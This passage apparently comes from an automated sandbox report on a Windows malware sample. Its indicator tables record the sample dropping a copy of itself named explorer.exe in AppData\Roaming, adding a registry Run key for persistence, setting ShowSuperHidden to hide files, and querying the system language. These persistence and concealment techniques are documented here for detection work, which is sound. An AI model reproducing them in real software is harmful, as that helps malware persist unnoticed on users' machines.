| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
